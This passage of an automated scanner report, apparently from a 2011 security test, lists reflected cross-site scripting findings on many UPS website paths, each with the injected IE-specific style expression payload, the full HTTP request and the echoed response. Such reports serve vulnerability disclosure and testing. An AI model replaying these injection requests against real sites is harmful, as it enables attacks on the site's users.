X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 35099


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us1657c"style="x:expression(alert(1))"d0105cd917d/en/resources/ship/terms/shipping/index.html">
...[SNIP]...

1.87. http://www.ups.com/content/us/en/resources/ship/terms/shipping/index.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/ship/terms/shipping/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c72a4"style%3d"x%3aexpression(alert(1))"ed012a4aeed was submitted in the REST URL parameter 3. This input was echoed as c72a4"style="x:expression(alert(1))"ed012a4aeed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/enc72a4"style%3d"x%3aexpression(alert(1))"ed012a4aeed/resources/ship/terms/shipping/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:13 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 35099


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/enc72a4"style="x:expression(alert(1))"ed012a4aeed/resources/ship/terms/shipping/index.html">
...[SNIP]...

1.88. http://www.ups.com/content/us/en/resources/ship/terms/use.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/ship/terms/use.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e5ab"style%3d"x%3aexpression(alert(1))"1918f7292db was submitted in the REST URL parameter 2. This input was echoed as 9e5ab"style="x:expression(alert(1))"1918f7292db in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us9e5ab"style%3d"x%3aexpression(alert(1))"1918f7292db/en/resources/ship/terms/use.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:12 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 75964


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us9e5ab"style="x:expression(alert(1))"1918f7292db/en/resources/ship/terms/use.html">
...[SNIP]...

1.89. http://www.ups.com/content/us/en/resources/ship/terms/use.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/ship/terms/use.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36adc"style%3d"x%3aexpression(alert(1))"4da2f01a87e was submitted in the REST URL parameter 3. This input was echoed as 36adc"style="x:expression(alert(1))"4da2f01a87e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en36adc"style%3d"x%3aexpression(alert(1))"4da2f01a87e/resources/ship/terms/use.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:13 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 76404


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en36adc"style="x:expression(alert(1))"4da2f01a87e/resources/ship/terms/use.html">
...[SNIP]...

1.90. http://www.ups.com/content/us/en/resources/start/index.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/start/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4af5"style%3d"x%3aexpression(alert(1))"4ad883a8c4a was submitted in the REST URL parameter 2. This input was echoed as f4af5"style="x:expression(alert(1))"4ad883a8c4a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/usf4af5"style%3d"x%3aexpression(alert(1))"4ad883a8c4a/en/resources/start/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:06 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42424


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usf4af5"style="x:expression(alert(1))"4ad883a8c4a/en/resources/start/index.html">
...[SNIP]...

1.91. http://www.ups.com/content/us/en/resources/start/index.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/start/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2df07"style%3d"x%3aexpression(alert(1))"09777fba220 was submitted in the REST URL parameter 3. This input was echoed as 2df07"style="x:expression(alert(1))"09777fba220 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en2df07"style%3d"x%3aexpression(alert(1))"09777fba220/resources/start/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:07 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42424


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en2df07"style="x:expression(alert(1))"09777fba220/resources/start/index.html">
...[SNIP]...

1.92. http://www.ups.com/content/us/en/resources/techsupport/index.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/techsupport/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f1df"style%3d"x%3aexpression(alert(1))"83776d167cc was submitted in the REST URL parameter 2. This input was echoed as 9f1df"style="x:expression(alert(1))"83776d167cc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us9f1df"style%3d"x%3aexpression(alert(1))"83776d167cc/en/resources/techsupport/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:19 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 45127


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us9f1df"style="x:expression(alert(1))"83776d167cc/en/resources/techsupport/index.html">
...[SNIP]...

1.93. http://www.ups.com/content/us/en/resources/techsupport/index.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/techsupport/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ff19"style%3d"x%3aexpression(alert(1))"b13ed736f3 was submitted in the REST URL parameter 3. This input was echoed as 4ff19"style="x:expression(alert(1))"b13ed736f3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en4ff19"style%3d"x%3aexpression(alert(1))"b13ed736f3/resources/techsupport/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:22 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 45125


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en4ff19"style="x:expression(alert(1))"b13ed736f3/resources/techsupport/index.html">
...[SNIP]...

1.94. http://www.ups.com/content/us/en/resources/track/index.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/track/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f30c7"style%3d"x%3aexpression(alert(1))"1c7f06c7cef was submitted in the REST URL parameter 2. This input was echoed as f30c7"style="x:expression(alert(1))"1c7f06c7cef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/usf30c7"style%3d"x%3aexpression(alert(1))"1c7f06c7cef/en/resources/track/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:12 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42703


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usf30c7"style="x:expression(alert(1))"1c7f06c7cef/en/resources/track/index.html">
...[SNIP]...

1.95. http://www.ups.com/content/us/en/resources/track/index.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/track/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96d3c"style%3d"x%3aexpression(alert(1))"7996a1d6184 was submitted in the REST URL parameter 3. This input was echoed as 96d3c"style="x:expression(alert(1))"7996a1d6184 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en96d3c"style%3d"x%3aexpression(alert(1))"7996a1d6184/resources/track/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:13 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43143


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en96d3c"style="x:expression(alert(1))"7996a1d6184/resources/track/index.html">
...[SNIP]...

1.96. http://www.ups.com/content/us/en/shipping/index.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/shipping/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f8ea"style%3d"x%3aexpression(alert(1))"c56152e9033 was submitted in the REST URL parameter 2. This input was echoed as 2f8ea"style="x:expression(alert(1))"c56152e9033 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us2f8ea"style%3d"x%3aexpression(alert(1))"c56152e9033/en/shipping/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:54 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 58458


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us2f8ea"style="x:expression(alert(1))"c56152e9033/en/shipping/index.html">
...[SNIP]...

1.97. http://www.ups.com/content/us/en/shipping/index.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/shipping/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17ab7"style%3d"x%3aexpression(alert(1))"0664130560d was submitted in the REST URL parameter 3. This input was echoed as 17ab7"style="x:expression(alert(1))"0664130560d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en17ab7"style%3d"x%3aexpression(alert(1))"0664130560d/shipping/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:56 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 58028


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en17ab7"style="x:expression(alert(1))"0664130560d/shipping/index.html">
...[SNIP]...

1.98. http://www.ups.com/content/us/en/shipping/time/service/index.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/shipping/time/service/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4ac1"style%3d"x%3aexpression(alert(1))"17b4988c95f was submitted in the REST URL parameter 2. This input was echoed as d4ac1"style="x:expression(alert(1))"17b4988c95f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/usd4ac1"style%3d"x%3aexpression(alert(1))"17b4988c95f/en/shipping/time/service/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:55 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 56194


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usd4ac1"style="x:expression(alert(1))"17b4988c95f/en/shipping/time/service/index.html">
...[SNIP]...

1.99. http://www.ups.com/content/us/en/shipping/time/service/index.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/shipping/time/service/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b24d"style%3d"x%3aexpression(alert(1))"686e1186d20 was submitted in the REST URL parameter 3. This input was echoed as 7b24d"style="x:expression(alert(1))"686e1186d20 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en7b24d"style%3d"x%3aexpression(alert(1))"686e1186d20/shipping/time/service/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:56 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 56193


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en7b24d"style="x:expression(alert(1))"686e1186d20/shipping/time/service/index.html">
...[SNIP]...

1.100. http://www.ups.com/content/us/en/shipping/time/service/shipping/index.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/shipping/time/service/shipping/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27baa"style%3d"x%3aexpression(alert(1))"2e2ebd57b71 was submitted in the REST URL parameter 2. This input was echoed as 27baa"style="x:expression(alert(1))"2e2ebd57b71 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us27baa"style%3d"x%3aexpression(alert(1))"2e2ebd57b71/en/shipping/time/service/shipping/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:55 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 54858


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us27baa"style="x:expression(alert(1))"2e2ebd57b71/en/shipping/time/service/shipping/index.html">
...[SNIP]...

1.101. http://www.ups.com/content/us/en/shipping/time/service/shipping/index.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/shipping/time/service/shipping/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb749"style%3d"x%3aexpression(alert(1))"2d88e2596e7 was submitted in the REST URL parameter 3. This input was echoed as eb749"style="x:expression(alert(1))"2d88e2596e7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/eneb749"style%3d"x%3aexpression(alert(1))"2d88e2596e7/shipping/time/service/shipping/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:57 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 54847


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/eneb749"style="x:expression(alert(1))"2d88e2596e7/shipping/time/service/shipping/index.html">
...[SNIP]...

1.102. http://www.ups.com/content/us/en/siteguide/index.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/siteguide/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff296"style%3d"x%3aexpression(alert(1))"5ef14c9e61 was submitted in the REST URL parameter 2. This input was echoed as ff296"style="x:expression(alert(1))"5ef14c9e61 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/usff296"style%3d"x%3aexpression(alert(1))"5ef14c9e61/en/siteguide/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:36 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 61601


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usff296"style="x:expression(alert(1))"5ef14c9e61/en/siteguide/index.html">
...[SNIP]...

1.103. http://www.ups.com/content/us/en/siteguide/index.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
